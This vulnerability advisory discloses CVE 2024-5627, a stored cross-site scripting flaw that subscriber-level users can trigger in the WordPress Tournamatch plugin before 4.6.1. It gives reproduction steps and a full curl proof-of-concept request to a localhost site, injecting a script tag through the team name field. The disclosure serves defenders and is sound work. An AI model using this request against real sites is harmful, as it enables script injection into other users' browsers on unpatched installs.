WordPress Plugin Tournamatch < 4.6.1 – Subscriber+ Stored XSS | CVE 2024-5627

Description

The plugin does not sanitise and escape some parameters, which could allow users with a role as low as subscriber to perform Cross-Site Scripting attacks.

Proof of Concept

1. Navigate to Users >> Add New User and create a new User with valid data
2. Login as the New User and go to /teams (Automatically created and managed by the plugin Tournamatch)
3. Navigate to Create Team and create a New Team
4. Capture the request into Burp Suite and change the value of the "name" parameter with any JavaScript payload such as: <script>alert(1)</script>
5. You will observe that the payload successfully got stored into the database and executed therefore popping up an alert when the Team List is displayed.

--- Curl Command ---

curl 'http://localhost/wp-json/tournamatch/v1/teams/2' \
  -H 'Accept: */*' \
  -H 'Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03HdXuaWqjVKYNTZ' \
  -H 'Cookie: wp-settings-time-1=1715708157; wp-settings-1=libraryContent%3Dbrowse; cookieyes-consent=consentid:aGNkRWVNWUlyb1JpQmhTekFTbXl3b0FZSzFtVm9QMUw,consent:yes,action:yes,necessary:yes,functional:yes,analytics:yes,performance:yes,advertisement:yes; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=testdemo%7C1715964411%7CkTvsUsqc3Gd1G19Bq5FDxPbISW9Ia08R5seNlQM0UER%7C40605fa1b5d965ff039eb201405086e5ecc6c7d886d2b41ca0fbfc64800d490e' \
  -H 'Origin: http://localhost' \
  -H 'Referer: http://localhost/teams/2/edit' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36' \
  -H 'X-WP-Nonce: 196349755f' \
  -H 'sec-ch-ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"' \
  -H 'sec-ch-ua-mobile: ?1' \
  -H 'sec-ch-ua-platform: "Android"' \
  --data-raw $'------WebKitFormBoundary03HdXuaWqjVKYNTZ\r\nContent-Disposition: form-data; name="name"\r\n\r\n<script>alert(1)</script>\r\n------WebKitFormBoundary03HdXuaWqjVKYNTZ\r\nContent-Disposition: form-data; name="tag"\r\n\r\n22\r\n------WebKitFormBoundary03HdXuaWqjVKYNTZ\r\nContent-Disposition: form-data; name="flag"\r\n\r\nblank.gif\r\n------WebKitFormBoundary03HdXuaWqjVKYNTZ\r\nContent-Disposition: form-data; name="avatar"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundary03HdXuaWqjVKYNTZ\r\nContent-Disposition: form-data; name="banner"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundary03HdXuaWqjVKYNTZ--\r\n'